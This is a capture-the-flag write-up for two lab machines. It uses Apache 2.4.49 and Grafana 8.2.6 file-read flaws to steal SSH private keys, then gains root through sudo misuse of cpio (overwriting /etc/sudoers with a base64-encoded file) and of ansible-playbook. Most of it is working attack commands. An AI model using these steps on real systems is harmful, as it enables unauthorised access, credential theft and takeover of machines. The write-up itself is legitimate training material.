CTF URL: https://bctf.africa/

In this CTF we are given target machines


port 80 is open


from the response header we notice that it is running on Apache/2.4.49 version and by googling we know that it is vulnerable to LFI

using the exploite we can get the id_rsa file

bash apache_PoC.txt targets.txt /home/BRCTF/.ssh/id_rsa > id_rsa

now using this key file we can login to ssh

ssh [email protected] -i .\id_rsa

to know the username BRCTF we read the /etc/passwd file using the same exploite

we are able to login and we can use cpio with sudo without password


we can use cpio to change the /etc/sudoers file so we can run any binary with sudo without password

we can use the following commands to read the current sudoers file

echo "/etc/sudoers" > namelist
sudo cpio -o < namelist > archive
cat archive

it will save the files in namelist to archive

now we have to add BRCTF ALL=NOPASSWD: ALL in sudoers file

echo "RGVmYXVsdHMgICBlbnZfcmVzZXQNCkRlZmF1bHRzICAgbWFpbF9iYWRwYXNzDQpEZWZhdWx0cyAgIHNlY3VyZV9wYXRoPSIvdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3Vzci9zYmluOi91c3IvYmluOi9zYmluOi9iaW4iDQoNCiMgSG9zdCBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgVXNlciBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgQ21uZCBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgVXNlciBwcml2aWxlZ2Ugc3BlY2lmaWNhdGlvbg0Kcm9vdCAgQUxMPShBTEw6QUxMKSBBTEwNCkJSQ1RGIEFMTD1OT1BBU1NXRDogQUxMDQoNCiMgQWxsb3cgbWVtYmVycyBvZiBncm91cCBzdWRvIHRvIGV4ZWN1dGUgYW55IGNvbW1hbmQNCiVzdWRvIEFMTD0oQUxMOkFMTCkgQUxMDQoNCiMgU2VlIHN1ZG9lcnMoNSkgZm9yIG1vcmUgaW5mb3JtYXRpb24gb24gIkBpbmNsdWRlIiBkaXJlY3RpdmVzOg0KDQpAaW5jbHVkZWRpciAvZXRjL3N1ZG9lcnMuZA==" | base64 -d > sudoers
echo sudoers > namelist
sudo cpio --no-preserve-owner -p /etc < namelist

this base64 content is our modified file and we save it in current directory
--no-preserve-owner : Do not change the ownership of the files
It will save our modified file in /etc folder overwriting the existing one and without changing the file ownership or it will create error


now we are root


port 3000 is open


it running grafana v8.2.6 and it is vulnerable to LFI
just like privious challange we read the /home/BRCTF/.ssh/id_rsa file and connect to ssh


we can now connect to ssh

ssh [email protected] -i .\id_rsa.txt


we use https://gtfobins.github.io/gtfobins/ansible-playbook/#sudo payload to get root

echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
sudo ansible-playbook $TF


Happy Hacking